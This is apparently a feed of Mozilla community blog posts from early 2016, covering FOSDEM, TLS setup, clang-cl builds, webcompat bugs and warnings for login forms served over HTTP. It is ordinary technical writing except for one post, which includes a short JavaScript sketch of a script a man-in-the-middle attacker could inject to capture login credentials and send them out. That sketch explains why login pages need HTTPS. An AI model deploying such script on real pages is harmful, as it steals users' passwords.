The fundamental difference between frameworks and libraries is that when dealing with a framework, the framework provides the structure, and you have to fill in specific bits to make it apply to what you are doing. With a library, however, you are provided with a set of functionality, and you invoke the library to help you get the job done.
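The inversion of control can be shown in a toy Python sketch (not from the post; all names invented): with a framework, it calls you; with a library, you call it.

```python
# Framework style: the framework owns the control flow ("don't call
# us, we'll call you"); you only fill in the specific hooks.
class ReportFramework:
    def run(self):  # fixed overall structure, provided by the framework
        return f"== {self.title()} ==\n{self.body()}"
    def title(self): raise NotImplementedError  # hook you must fill in
    def body(self): raise NotImplementedError   # hook you must fill in

class SalesReport(ReportFramework):
    def title(self): return "Sales"
    def body(self): return "Q1 numbers"

# Library style: you own the control flow and assemble the pieces
# yourself, in whatever order and combination you want.
def heading(text): return f"== {text} =="
def paragraph(text): return text

framework_out = SalesReport().run()
library_out = "\n".join([heading("Sales"), paragraph("Q1 numbers")])
assert framework_out == library_out  # same result, inverted control
```

The framework version is less typing for the common case, but adding, say, a footer means fighting `run()`; the library version lets you rearrange the calls freely.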

It may not seem like a very big distinction at first, but it has a huge impact on various properties of the final product. For example, a framework is easier to use if what you are trying to do lines up with the goal the framework is intended to accomplish. The only thing you need to do is provide (or override) specific things that you need to customize, and the framework takes care of the rest. It's like a builder building your house, and you picking which tile pattern you want for the backsplash. With libraries there's a lot more work - you have a Home Depot full of tools and supplies, but you have to figure out how to put them together to build a house yourself.

The flip side, of course, is that with libraries you get a lot more freedom and customizability than you do with frameworks. With the house analogy, a builder won't add an extra floor for your house if it doesn't fit with their pre-defined floorplans for the subdivision. If you're building it yourself, though, you can do whatever you want.

The library approach makes the final workflow a lot more adaptable when faced with new situations. Once you are in a workflow dictated by a framework, it's very hard to change the workflow because you have almost no control over it - you only have as much control as it was designed to let you have. With libraries you can drop a library here, pick up another one there, and evolve your workflow incrementally, because you can use them however you want.

In the context of building code, the *nix toolchain (a pile of command-line tools that do very specific things) is a great example of the library approach - it's very adaptable as you can swap out commands for other commands to do what you need. An IDE, on the other hand, is more of a framework. It's easier to get started because the heavy lifting is taken care of, all you have to do is "insert code here". But if you want to do some special processing of the code that the IDE doesn't allow, you're out of luck.

An interesting thing to note is that usually people start with frameworks and move towards libraries as their needs get more complex and they need to customize their workflow more. It's not often that people go the other way, because once you've already spent the effort to build a customized workflow it's hard to justify throwing the freedom away and locking yourself down. But that's what it feels like we are doing at Mozilla - sometimes on purpose, and sometimes unintentionally, without realizing we are putting on a straitjacket.

The shift from Bugzilla/Splinter to MozReview is one example of this. Going from a customizable, flexible tool (attachments with flags) to a unified review process (push to MozReview) is a shift from libraries to frameworks. It forces people to conform to the workflow which the framework assumes, and for people used to their own customized, library-assisted workflow, that's a very hard transition. Another example of a shift from libraries to frameworks is the bug triage process that was announced recently.

I think in both of these cases the end goal is desirable and worth working towards, but we should realize that it entails (by definition) making things less flexible and adaptable. In theory the only workflows that we eliminate are the "undesirable" ones, e.g. a triage process that drops bugs on the floor, or a review process that makes patch context hard to access. In practice, though, other workflows - both legitimate workflows currently being used and potential improved workflows get eliminated as well.

Of course, things aren't all as black-and-white as I might have made them seem. As always, the specific context/situation matters a lot, and it's always a tradeoff between different goals - in the end there's no one-size-fits-all and the decision is something that needs careful consideration.

Marcia KnousFirefox OS QA at FOSDEM 2016

Despite the fact I have been around the Mozilla project for some time, I never did get the opportunity to attend the FOSDEM conference. This year I was fortunate enough to not only attend, but also to present along with Ioana Chiorean at FOSDEM in the Mozilla Developer Room. And I was in good company: Johan Lorenzo and Martijn Wargers of the QA team also presented a great Automation Session on Saturday.

Martijn Wargers and Johan Lorenzo presenting at FOSDEM 2016

There were several things

Ludovic HirlimannFosdem 2016 day 1

This year I’m attending Fosdem, after skipping it last year. It’s good to be back, even if I was very tired when I arrived yesterday night and managed to visit three of Brussels’ train stations. I was up early, and the indications on bus 71 were fucked up, so it took me a short walk under some rain to get to the campus - but I made it early and was able to take interesting pictures of the empty venue.

The first talk I attended was about MIPS for the embedded world. It was interesting for some tidbits, but felt more like a marketing pitch to use MIPS in future embedded projects.

After that I wandered around, found a bunch of ex-joosters, and had very interesting conversations with all of them.

I delivered my talk in 10 minutes and then answered question for the next 20 minutes.

The http2 talk was interesting and the room was packed, but it was probably not deep enough for me. Still, I think we should think about enabling http/2 on

I left to get some rest after talking to otto about blockchain and bitcoins.

Mike HommeyEnabling TLS on this blog

Long overdue, I finally enabled TLS on this blog. It went almost like a breeze.

I used simp_le to get the certificate from Let’s Encrypt, along with Mozilla’s Web Server Configuration generator. SSL Labs now reports a rating of A+.

I just had a few issues:

  • I had some hard-coded http:// links in my wordpress theme, that needed changes,
  • Since my wordpress instance is reverse-proxied and the real server is not behind HTTPS, I had to adjust the wordpress configuration so that it doesn’t end up in an infinite redirect loop,
  • Nginx’s config for multiple virtualhosts needs SSL configuration to be repeated. Fortunately, one can use include statements,
  • Contrary to the suggested configuration, setting ssl_session_tickets off; makes browsers unhappy (at least, it made my Firefox unhappy, with a SSL_ERROR_RX_UNEXPECTED_NEW_SESSION_TICKET error message).
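For reference, a sketch of the nginx arrangement the third and fourth bullets describe (paths, hostnames, and the snippet filename are hypothetical):

```nginx
# /etc/nginx/snippets/ssl.conf -- shared TLS settings, written once
ssl_certificate     /etc/letsencrypt/live/example.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
# Session tickets deliberately left at their default (on): adding
# "ssl_session_tickets off;" made Firefox fail with
# SSL_ERROR_RX_UNEXPECTED_NEW_SESSION_TICKET, as noted above.

# Each virtual host then pulls the shared settings in:
server {
    listen 443 ssl;
    server_name example.com;
    include snippets/ssl.conf;
    # site-specific configuration goes here
}
```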

I’m glad that there are tools helping to get a proper configuration of SSL. It is sad, though, that the defaults are not better and that we still need to tweak at all. Setting where the certificate and the private key files are should, in 2016, be the only thing to do to have a secure web server.

Chris CooperRelEng & RelOps Weekly Highlights - January 29, 2016

Well, that was a quick month! Time flies when you’re having fun…or something.

Modernize infrastructure:

In an effort to be more agile in creating and/or migrating webapps, Releng has a new domain name and SSL wildcard! The new domain is set up for management under inventory, and an SSL endpoint has been established in Heroku. See

Improve CI pipeline:

Coop (hey, that’s me!) re-enabled partner repacks as part of release automation this week, and was happy to see the partner repacks for the Firefox 44 release get generated and published without any manual intervention. Back in August, we moved the partner repack process and configuration into github from mercurial. This made it trivially easy for Mozilla partners to issue a pull request (PR) when a configuration change was needed. This did require some re-tooling on the automation side, and we took the opportunity to fix and update a lot of partner-related cruft, including moving the repack hosting to S3. I should note that the EME-free repacks are also generated automatically now as part of this process, so those of you who prefer less DRM with your Firefox can now also get your builds on a regular basis.


One of the main reasons why build promotion is so important for releng and Mozilla is that it removes the current disconnect between the nightly/aurora and beta/release build processes, the builds for which are created in different ways. This is one of the reasons why uplift cycles are so frequently “interesting” - build process changes on nightly and aurora don’t often have an existing analog in beta/release. And so it was this past Tuesday when releng started the beta1 process for Firefox 45. We quickly hit a blocker issue related to gtk3 support that prevented us from even running the initial source builder, a prerequisite for the rest of the release process. Nick, Rail, Callek, and Jordan put their heads together and quickly came up with an elegant solution that unblocked progress on all the affected branches, including ESR. In the end, the solution involved running tooltool from within a mock environment, rather than running it outside the mock environment and trying to copy relevant pieces in. Thanks for the quick thinking and extra effort to get this unblocked. Maybe the next beta1 cycle won’t suck quite as much! The patch that Nick prepared ( is now in production and being used to notify users on unsupported versions of GTK why they can’t update. In the past, they would’ve simply received no update with no information as to why.


Dustin made security improvements to TaskCluster, ensuring that expired credentials are not honored.

We had a brief Balrog outage this morning [Fri Jan 29]. Balrog is the server side component of the update system used by Firefox and other Mozilla products. Ben quickly tracked the problem down to a change in the caching code. Big thanks to mlankford, Usul, and w0ts0n from the MOC for their quick communication and help in getting things back to a good state quickly.


On Wednesday, Dustin spoke at Siena College, holding an information session on Google Summer of Code and speaking to a Software Engineering class about Mozilla, open source, and software engineering in the real world.

See you next week!

Yunier José Sosa VázquezVisualizing the Invisible

This is a translation of the original article published on The Mozilla Blog. Written by Jascha Kaykas-Wolff.

Nowadays, privacy and online threats such as invisible third-party tracking on the Web can seem very abstract. Many of us are not aware of what is happening with our data online, or feel powerless because we don't know what to do. Increasingly, the Internet is becoming a giant glass house where your personal information is exposed to third parties who collect it and use it for their own purposes.

We recently launched Private Browsing with Tracking Protection in Firefox – a feature focused on giving anyone who uses Firefox a meaningful choice against third parties on the Web that might collect their data without their knowledge or control. It addresses the need for more control over online privacy, but it is also connected to an ongoing and important debate about preserving a healthy, open and sustainable Web ecosystem, and about the problems and possible solutions around content blocking.

The Glass House

Earlier this month we spent three days at an event about online privacy in Hamburg, Germany. Today we would like to share some impressions from the event, as well as an experiment we filmed on the famous Reeperbahn.

Our experiment?

We set out to see whether we could explain something that is not easily visible, online privacy, in a very tangible way. We built an apartment fully equipped with everything needed to enjoy a short trip to the pearl of northern Germany, and made it available to various travelers staying overnight. Once they connected to the apartment's Wi-Fi, all the walls were removed, exposing the travelers to onlookers and to the outside commotion caused when their private information turned out to be public.

The travelers' responses to what happened to them are striking.

On video: watch what happens to our data

That said, we enlisted some actors to dramatize, a bit more theatrically, a not-so-subtle reference to what can happen to your data when you are not paying attention. Welcome to the glass house!

From Mozilla Hispano we urge all readers to recognize that, as users, they need to inform themselves in order to reflect on what happens when they go on the Web. Taking control requires tools and information, and to achieve this users must become self-directed, aware of the reality they live within their environment, so they can take matters into their own hands.

While the results of the experiment are meant to educate and raise awareness, we also captured the participants' thoughts and feelings after the intervention. Here are some of the most moving reactions:

From left to right: Lars Reppesgaard (author, "The Google Empire"), Svenja Teichmann (crowdmedia), Federico Richter (Chairman of the German Data Protection Foundation) and Winston Bowden (Sr. Product Marketing Manager for Firefox)

Discussing the state of data control on the Web today

In the two days following the intervention, in the same glass house, German privacy and technology experts, the Hamburg Digital Media Women group, the Mozilla community and people interested in online privacy gathered to discuss the "State of Data and Control on the Web".

We started with a panel discussion, moderated by Svenja Teichmann, founder and managing director of crowdmedia (now Sequel), together with German data protection experts. Protecting privacy online and questions such as "What is private these days?" were debated while passers-by could watch through the glass walls.

Federico Richter pointed out users' uncertainty: "On the Web we don't notice who is watching us. And many people cannot protect their privacy online because they lack easy-to-use features." Lars Reppesgaard is not completely against tracking on the Internet, but thinks users should have a choice: "If you want technology to help you, it sometimes needs to collect some data. But for most users it is not obvious when, and by whom, this tracking is being done." About the new Tracking Protection feature in Private Browsing in Firefox, Winston Bowden emphasized:

"We are not an enemy of online advertising. It is a legitimate source of revenue and it sustains tremendously exciting content on the Web. But if users are tracked without their knowledge, or even against their will, this kind of tracking will not work. The free and open Web is a valuable asset that we must protect. Users have to be in control of their data."

Education and Participation

Finally, members of the German Mozilla community joined the event to inform and educate people about how Firefox can help users gain control over their online experience. They explained the background and genesis of Tracking Protection, but also showed tools such as Lightbeam and talked about Smart On Privacy and Web Literacy, aiming to offer reference points for a better understanding of how the Web works.

Thanks to everyone who worked behind the scenes and/or came to Hamburg and made this event possible. We appreciate your help in educating and advocating so that people know about their choice and control over online privacy.

Finally, if you are interested in the topic, you can share this article on your social networks so everyone knows what is going on. That way you can join privacy month.

Source: Mozilla Hispano

Daniel GlazmanGoogle, and blacklists

Several painful things happened to yesterday... In chronological order:

  1. during my morning, two users reported that their browser did not let them reach the downloads section of without a security warning. I could not see it myself from here, whatever the browser or the platform.
  2. during the evening, I could see the warning using Chrome on OS X
  3. apparently, and if I am to believe the "Search Console", Google thought two files in my web repository of releases were infected. I launched a complete verification of the whole web site and ran all the software releases through three anti-virus systems (Sophos, Avast and AVG) and an anti-adware system. Nothing at all to report. No infection, no malware, no adware, nothing.
  4. since this was my only option, I deleted the two reported files from my server. Just for the record, the timestamps were unchanged, and I even verified the files were precisely the ones I uploaded in January and April 2012. Yes, 2012... Yesterday, without having been touched/modified in any manner during the last four years, they were erroneously reported infected.
  5. this morning, Firefox also reports a security warning on most large sections of and its Downloads section. I guess Firefox is also using the Google blacklist. Just for the record, both Spamhaus and CBL have nothing to say about
  6. the Google Search Console now reports my site is OK but Firefox still reports it insecure, ahem.

I need to draw a few conclusions here:

  • Google does not tell you in what way the reported files are insecure, which is really lame. The online tool they provide to "analyze" a web site did not help at all.
  • Since all my antivir/antiadware declared all files in my repo clean, I had absolutely no option but to delete the files that are now missing from my repo
  • two reported files in and led to blacklisting of all of and that's hundreds of files... Hey guys, we are and you are programmers, right? Sure you can do better than that?
  • during more than one day, customers fled from because of these security warnings, security warnings I consider fake reports. Since no public antimalware app could find anything to say about my files, I suspect a fake report of human origin. How such a report can reach the blacklist when files are reported safe by four up-to-date antimalware apps and w/o infection information reported to the webmaster is far beyond my understanding.
  • blacklists are a tool that can be harmful to businesses if they're not well managed.

Update: oh, and I forgot one thing: during the evening, blacklisted one of the Mail Transport Agents of Dreamhost. Not just my email address: the whole SMTP gateway at Dreamhost... So all my emails to one of my customers bounced and I can't even let her know some crucial information. I suppose thousands of Dreamhost users are impacted. I reported the issue to both Earthlink and DH, of course.

Karl Dubost[worklog] APZ bugs, Some webcompat bugs and HTTP Refresh

Monday, January 25, 2016. It's morning in Japan. The office room temperature is around 3°C (37.4°F). I just turned on the Aladdin. Sleep was short, or more exactly interrupted a couple of times. Let's go through emails after two weeks away.

My tune for WebCompat for this first quarter 2016 is Jurassic 5 - Quality Control.

MFA (Multi Factor Authentication)

Multi Factor Authentication in the computing industry is sold as something easier and more secure. I still have to be convinced about the easier part.

WebCompat Bugs

  • Bugzilla Activity
  • Github Activity
  • In Bug 1239922, Google Docs is sending HiRes icons only to WebKit devices because of a media query @media screen and (-webkit-min-device-pixel-ratio:2) {} in the CSS. One difference is that outside the media query the images are set through content on a pseudo-element, but inside it directly on the element itself. It is currently a non-standard feature, as explained by Daniel Holbert. We contacted them. A discussion has been started and the magical Daniel dived a bit deeper into the issue. Read it.
  • Google Search seems to have ditched the opensearch link in the HTML head. As a result, it is more difficult for users to add the search engine for specific locales. Contacted.
  • Google Custom Search is not sending the same search result links to Firefox Desktop and iOS 9 on one side as to Firefox Android on the other. Firefox Android receives instead of This is unfortunate because is a 404.
  • DeKlab is sending some resources (a template for Dojo) with a bogus BOM. Firefox is stricter than Chrome on this and rejects the document, which in turn breaks the application. Being stricter is cool and the site should be contacted, but at the same time the pressure of it working in Chrome makes it harder to convince devs.
  • When creating a set of images for srcset, make absolutely sure that your images are actually on the server.
  • Some bugs are harder to test than others. is not accessible from Japan. Maybe it's working from USA. If someone can test for us.
  • When mixing em and px in a design you always risk that the fonts and rounding of values will not be exactly the same in all browsers.
  • There is an interesting bug with fonts being truncated on Twitter differently on Linux than on other platforms, depending on the fonts. Boris Zbarsky suspects that Twitter somehow plays with the font. I started to dig to extract more information.
  • Strange issue on a 360 video not playing in IceWeasel. This seems related specifically to the Debian version.
  • Some of the bugs we had with Japanese Web sites are being fixed, silently as usual. Once we have reached out, the person will not always tell us, "hey, we deployed a fix."
  • A developer is working on a Web site and, because of a performance or feature issue, feels the need to create a script to block a specific user-agent string. Time passes. We analyze. We find the contact information given on the site. We try to contact them and get no answer. We try again, this time on Twitter. And the person replies that he is not working there anymore, so he can't fix the user-agent sniffing. Apart from the frustration this creates, you can see how the user-agent sniffing strategy is broken: it doesn't take the evolution of implementations and human changes into consideration. User-agent sniffing may work, but it is a very high-maintenance choice with long-term consequences. It's not zero cost.
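
The kind of blocking script described in that last bullet often boils down to something like this (a hypothetical sketch, not the site's actual code):

```javascript
// Hypothetical sketch of brittle user-agent sniffing: block "old" Firefox.
// Hard-coded version cut-offs like this rot as browsers evolve, which is
// exactly the maintenance cost described above.
function isBlocked(userAgent) {
  const match = /Firefox\/(\d+)/.exec(userAgent);
  return match !== null && Number(match[1]) < 45;
}

isBlocked('Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0'); // true today...
isBlocked('Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'); // ...but who updates the 45?
```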

APZ Bugs

There's a list of scrolling bugs which affect Firefox. The issue is documented on MDN.

These effects work well in browsers where the scrolling is done synchronously on the browser's main thread. However, most browsers now support some sort of asynchronous scrolling in order to provide a consistent 60 frames per second experience to the user. In the asynchronous scrolling model, the visual scroll position is updated in the compositor thread and is visible to the user before the scroll event is updated in the DOM and fired on the main thread. This means that the effects implemented will lag a little bit behind what the user sees the scroll position to be. This can cause the effect to be laggy, janky, or jittery — in short, something we want to avoid.

So if you know someone (or a friend of a friend) who is able to fix one of these APZ bugs, or can put us in contact with the site owners, please tell us in the bug comments or on IRC (#webcompat on I did a first pass of bug triage for contacting the sites.

Some of these bugs are not yet mature in terms of outreach status. With Addons/e10s and APZ, it might happen more often that the Web Compat team is contacted to reach out to sites which have quirks, specific code hindering Firefox, etc. But reaching out to a Web site first requires a couple of steps and some understanding. I need to write something about this. Added to my TODO list.

Addons e10s

Difficult to make progress in some cases, because the developers have completely disappeared. I wonder in some cases if it would not just be better to completely remove the addon from the addons list. It would both give someone else the chance to propose something if users need it (nature abhors a vacuum) and/or give the main developer a reason to wake up and wonder why the addon is not downloadable anymore.

Webcompat Life

We had a meeting where we discussed APZ, the WebCompat wiki, Firefox OS Tier 3 and WebKit CSS bugs status.

Pile of mails

  • Around 1000 emails after 2 weeks is not too bad. I dealt in priority with those where my email address is directly in the To: field (dynamic mailbox), then the ones where I'm needinfo'd in Bugzilla, then finally the ones addressed to specific mailing lists where I have work to do. For the rest, a rapid scan of the topics (good email subjects are important. Remember!) and marking as read all the ones in which I have no interest. I'm almost done with all these emails in one day.

HTTP Refresh


  • explain what is necessary to consider a bug "ready for outreach".
  • check the webkitcss bugs we had in Bugzilla and
  • check if the bugs still open about Firefox OS are happening on Firefox Android
  • test Google search properties and see if we can find a version which works better on Firefox Android than the current default version sent by Google. Maybe test with the Chrome UA and the iPhone UA.


Andy McKayWhy I closed your bug

Because I'm mean. Well not really, but I understand how it can feel that way.

Web sites at Mozilla have a unique advantage in that they are open source. That is great for development and contributions, although the number of contributions tends to be lower than for Firefox and other projects [1].

Just like Firefox, anyone can file a bug and anyone can send in a patch. Which is truly awesome, and for the last 10+ years AMO has had some excellent contributors as well as paid staff helping it out. Except there are a few basic problems:

  • There are always new features, new edge cases, new problems to be solved.

  • Each new feature spawns new bugs.

  • Each new feature interacts with other features to become more and more complex.

  • The number of bugs on the site grows to overwhelming proportions given time.

  • The maintenance burden grows and grows until no new features can be added without getting more resources.

This is probably a familiar cycle to many. In open source projects you can fork and take your project off in a different direction. In the case of AMO, though, you really can't, since there's only one such site for Firefox.

And therein lies the dilemma. At Mozilla we've gone through various phases of paid-contributor support for AMO: from lots of developers, to none, to one, to lots of developers.

The one continual theme through all of them: the number of features and bugs just keeps growing, and to get more done we need more and more people.

So let's return to that bug you've filed asking for something on AMO. We'll think quite unsurprisingly of things like:

  • Will it add complexity or remove it?

  • What are the long term maintenance and security issues?

  • Will it be used?

...that shouldn't be too much of a surprise. But that might mean that we won't take that bug, or pull request, and then you'll think we are mean.

In the past I've seen bugs triaged as "P5 Enhancement" (or maybe even "good first bug" or "patches welcome"), and this is just a cop-out. Basically: we don't want to work on this so we are going to ignore it; we know that you don't really want to work on the feature either, and it sits in limbo. I'd rather be up front and close it.

The only way we can make a site like AMO maintainable is by keeping the complexity and feature set down. After all, there's a lot of work to be done around add-ons, the more we can keep the complex things simple, the more we can do.

[1] Citation needed.

Ehsan AkhgariBuilding Firefox With clang-cl: A Status Update

Last June, I wrote about enabling building Firefox with clang-cl.  We didn’t get these builds up on the infrastructure, things regressed on both the Mozilla and LLVM side, and we got to a state where clang-cl either wouldn’t compile Firefox any more, or the resulting build would be severely broken.  It took us months, but earlier today we finally managed to get a full x86-64 Firefox build with clang-cl!  The build works for basic browsing (except that it crashes on for reasons we haven’t diagnosed yet) and, just for extra fun, I ran all of our service worker tests (which I happen to run many times a day on other platforms) and they all passed.

This time, we got to an impressive milestone.  Previously, we were building Firefox with the help of clang-cl’s fallback mode (which falls back to MSVC when clang fails to build a file for whatever reason) but this time we have a build of Firefox that is fully produced with clang, without even using the MSVC compiler once.  And that includes all of our C++ tests too.  (Note that we still use the rest of the Microsoft toolchain, such as the linker, resource compiler, etc. to produce the ultimate binaries; I’m only focusing on C and C++ compilation in this post.)

We should now try to keep these builds working.  I believe that this is a big opportunity for Firefox to be able to leverage, on Windows, where we have most of our users, the modern toolchain that we have been enjoying on other platforms.  An open source compilation toolchain has long been needed on Windows, and clang-cl is the first open source compiler that is designed to be a drop-in replacement for MSVC, and that makes it an ideal target for Firefox.  Also, Microsoft’s recent integration of clang as a front-end for the MSVC code generator raises the prospect of switching to clang/C2 in the future as our default compiler on Windows (assuming that the performance of our clang-cl builds doesn’t end up being on par with the MSVC PGO compiler).

My next priority for this project would be to stand up Windows static analysis builds on TreeHerder.  That requires getting our clang-plugin to work on Windows, fixing the issues that it may find (since that would be the first time we would be running our static analyses on Windows!), and trying to get them up and running on TaskCluster.  That way we would be able to leverage our static analysis on Windows as the first fruit of this effort, and also keep these builds working in the future.  Since clang-cl is still being heavily developed, we will be preparing periodic updates to the compiler, potentially fixing the issues that may have been uncovered in either Firefox or LLVM, so that we keep up with the development in both projects.

Some of the future things that I think we should look into, sorted by priority:

  • Get DXR to work on Windows.  Once we port our static analysis clang plugin to Windows, the next logical step would be to get the DXR indexer clang plugin to work on Windows, so that we can get a DXR that works for Windows specific code too.
  • Look into getting these builds to pass our test suites.  So far we are at a stage where clang-cl can understand all of our C and C++ code on Windows, but the generated code is still not completely correct.  Right now we’re at such an early stage that one can find crashes etc. within minutes of browsing.  But we need to get all of our tests to pass in these builds in order to get a rock-solid browser built with clang-cl.  This will also help the clang-cl project, since we have been reporting clang-cl bugs that the Firefox code has continually uncovered, and on occasion also fixes to those bugs.  Although the rate of LLVM-side issues has decreased dramatically as the compiler has matured, I expect to find LLVM bugs occasionally, and hope to continue to work with the LLVM project to resolve them.
  • Get the clang-based sanitizers to work on Windows, to extend their coverage to Windows.  This includes things such as AddressSanitizer, ThreadSanitizer, LeakSanitizer, etc.  The security team has been asking for AddressSanitizer for a long time.  We could definitely benefit from the Windows specific coverage of all of these tools.  Obviously the first step is to get a solid build that works.  We have previously attempted to use AddressSanitizer on Windows but we have run into a lot of AddressSanitizer specific issues that we had to fix on both sides.  These efforts have been halted for a while since we have been focusing on getting the basic compilation to work again.
  • Start to do hybrid builds, where we randomly pick either clang-cl or MSVC to build each individual file.  This is required to improve clang-cl’s ABI compatibility.  The reason that is important is that compiler bugs in a lot of cases manifest themselves as hard-to-explain artifacts in the functionality, anything from a random crash somewhere where everything should be working fine, to parts of the rendering going black for unclear reasons.  A cost-effective way to diagnose such issues is getting us to a point where we can mix and match object files produced by either compiler to get a correct build, and then bisect between the compilers to find the translation unit that is being miscompiled, and then keep bisecting to find the function (and sometimes the exact part of the code) that is being miscompiled.  This is basically impractical without a good story for ABI compatibility in clang-cl.  We have recently hit a few of these issues.
  • Improving support for debug information generation in LLVM to a point that we can use Breakpad to generate crash stacks for crash-stats.  This should enable us to advertise these builds to a small community of dogfooders.
  • Start to look at a performance comparison between clang-cl and MSVC builds.  This plus the bisection infrastructure I touched on above should generate a wealth of information on performance issues in clang-cl, and then we can fix them with the help of the LLVM community.  Also, in case the numbers aren’t too far apart, maybe even ship one Firefox Nightly for Windows built with clang-cl, as a milestone!  :-)
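
The hybrid-build bisection idea from the list above can be sketched as follows. `buildWorks` is a hypothetical predicate: compile the given subset of translation units with clang-cl (the rest with MSVC), relink, and report whether the resulting browser works:

```javascript
// Bisect a list of translation units to find the one that is miscompiled.
// buildWorks(subset) is hypothetical: it stands in for an actual rebuild
// with `subset` compiled by clang-cl and everything else by MSVC.
function findMiscompiledUnit(files, buildWorks) {
  let suspects = files;
  while (suspects.length > 1) {
    const half = suspects.slice(0, Math.ceil(suspects.length / 2));
    // If the build works with `half` on clang-cl, the culprit is elsewhere.
    suspects = buildWorks(half) ? suspects.slice(half.length) : half;
  }
  return suspects[0];
}
```

This is just a binary search over object files, so finding one bad translation unit among thousands takes on the order of a dozen rebuilds, which is why ABI compatibility (making mixed builds link and run at all) is the prerequisite.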

Longer term, we can look into issues such as helping to add full debug information support, with the goal of making it possible to use Visual Studio on Windows with these builds.  Right now, we basically debug at the assembly level.  Facilitating this would probably help speed up development too, so perhaps we should start on it earlier.   There is also LLDB on Windows, which should in theory be able to consume the DWARF debug information that clang-cl can generate, similar to how it does on Linux, so that is worth looking into as well. I’m sure there are other things that I’m not currently thinking of that we can do as well.

Last but not least, this has been a collaboration between quite a few people, on the Mozilla side, Jeff Muizelaar, David Major, Nathan Froyd, Mike Hommey, Raymond Forbes and myself, and on the LLVM side many members of the Google compiler and Chromium teams: Reid Kleckner, David Majnemer, Hans Wennborg, Richard Smith, Nico Weber, Timur Iskhodzhanov, and the rest of the LLVM community who made clang-cl possible.  I’m sure I’m forgetting some important names.  I would like to thank all of these people for their help and effort.

Air MozillaPrivacy Lab - Privacy for Startups - January 2016

Privacy Lab - Privacy for Startups - January 2016 Privacy for Startups: Practical Guidance for Founders, Engineers, Marketing, and those who support them Startups often espouse mottos that make traditional Fortune 500 companies cringe....

Tanvi VyasNo More Passwords over HTTP, Please!

Firefox Developer Edition 46 warns developers when login credentials are requested over HTTP.

Username and password pairs control access to users’ personal data. Websites should handle this information with care and only request passwords over secure (authenticated and encrypted) connections, like HTTPS. Unfortunately, we too frequently see non-secure connections, like HTTP, used to handle user passwords. To inform developers about this privacy and security vulnerability, Firefox Developer Edition warns developers of the issue by changing the security iconography of non-secure pages to a lock with a red strikethrough.

Firefox Developer Edition 46+ shows a lock with a red strikethrough on non-secure pages that have a password field, while Firefox Release does not include that additional iconography

How does Firefox determine if a password field is secure or not?

Firefox determines if a password field is secure by examining the page it is embedded in. The embedding page is checked against the algorithm in the W3C’s Secure Contexts Specification to see if it is secure or non-secure. Anything on a non-secure page can be manipulated by a Man-In-The-Middle (MITM) attacker. The MITM can use a number of mechanisms to extract the password entered onto the non-secure page. Here are some examples:

      • Change the form action so the password submits to an attacker controlled server instead of the intended destination. Then seamlessly redirect to the intended destination, while sending along the stolen password.
      • Use javascript to grab the contents of the password field before submission and send it to the attacker’s server.
      • Use javascript to log the user’s keystrokes and send them to the attacker’s server.

Note that all of the attacks mentioned above can occur without the user realizing that their account has been compromised.

Firefox has been alerting developers of this issue via the Developer Tools Web Console since Firefox 26.

Why isn’t submitting over HTTPS enough? Why does the page have to be HTTPS?

We get this question a lot, so I thought I would call it out specifically. Although transmitting over HTTPS instead of HTTP does prevent a network eavesdropper from seeing a user’s password, it does not prevent an active MITM attacker from extracting the password from the non-secure HTTP page. As described above, active attackers can MITM an HTTP connection between the server and the user’s computer to change the contents of the webpage. The attacker can take the HTML content that the site attempted to deliver to the user and add javascript to the HTML page that will steal the user’s username and password. The attacker then sends the updated HTML to the user. When the user enters their username and password, it will get sent to both the attacker and the site.
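
The injected script that paragraph describes can be very small. A hypothetical sketch (the attacker endpoint is invented, the exfiltration call is left as a comment, and a plain object stands in for the DOM form so the logic is self-contained):

```javascript
// Script a MITM could inject into a non-secure login page: copy the
// credentials on submit and quietly send them to the attacker before
// letting the real submission proceed.
const stolen = {};
function captureCredentials(form) {
  form.onsubmit = function () {
    stolen.user = form.fields.username;
    stolen.pass = form.fields.password;
    // navigator.sendBeacon('', JSON.stringify(stolen));
    // (exfiltration call commented out; the endpoint is hypothetical)
    return true; // the real submission continues, so the victim notices nothing
  };
}

// Stand-in form object (no DOM here):
const form = { fields: { username: 'alice', password: 'hunter2' } };
captureCredentials(form);
form.onsubmit();
```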

What if the credentials for my site really aren’t that sensitive?

Sometimes sites require username and passwords, but don’t actually store data that is very sensitive. For example, a news site may save which news articles a user wants to go back and read, but not save any other data about a user. Most users don’t consider this highly sensitive information. Web developers of the news site may be less motivated to secure their site and their user credentials. Unfortunately, password reuse is a big problem. Users use the same password across multiple sites (news sites, social networks, email providers, banks). Hence, even if access to the username and password to your site doesn’t seem like a huge risk to you, it is a great risk to users who have used the same username and password to login to their bank accounts. Attackers are getting smarter; they steal username/password pairs from one site, and then try reusing them on more lucrative sites.

How can I remove this warning from my site?

Put your login forms on HTTPS pages.

Of course, the most straightforward way to do this is to move your whole website to HTTPS. If you aren’t able to do this today, create a separate HTTPS page that is just used for logins. Whenever a user wants to login to your site, they will visit the HTTPS login page. If your login form submits to an HTTPS endpoint, parts of your domain may already be set up to use HTTPS.

In order to host content over HTTPS, you need a TLS Certificate from a Certificate Authority. Let’s Encrypt is a Certificate Authority that can issue you free certificates. You can reference these pages for some guidance on configuring your servers.

What can I do if I don’t control the webpage?

We know that users of Firefox Developer Edition don’t only use Developer Edition to work on their own websites. They also use it to browse the net. Developers who see this warning on a page they don’t control can still take a couple of actions. You can try to add “https://” to the beginning of the URL in the address bar and see whether you can log in over a secure connection to help protect your data. You can also try to reach out to the website administrator and alert them to the privacy and security vulnerability on their site.

Do you have examples of real life attacks that occurred because of stolen passwords?

There are ample examples of password reuse leading to large scale compromise. There are fewer well-known examples of passwords being stolen by performing MITM attacks on login forms, but the basic techniques of JavaScript injection have been used at scale by Internet Service Providers and governments.

Why does my browser sometimes show this warning when I don’t see a password field on the page?

Sometimes password fields are in a hidden <div> on a page that does not show up without user interaction. We have a bug open to detect when a password field is actually visible on the page.

Will this feature become available to Firefox Beta and Release Users?

Right now, the focus for this feature is on developers, since they’re the ones that ultimately need to fix the sites that are exposing users’ passwords. In general, though, since we are working on deprecating non-secure HTTP in the long run, you should expect to see more and more explicit indications of when things are not secure. For example, in all current versions of Firefox, the Developer Tools Network Monitor shows the lock with a red strikethrough for all non-secure HTTP connections.

How do I enable this warning in other versions of Firefox?

Users of Firefox version 44+ (on any branch) can enable or disable this feature by following these steps:

      1. Open a new window or tab in Firefox.
      2. Type about:config and press enter.
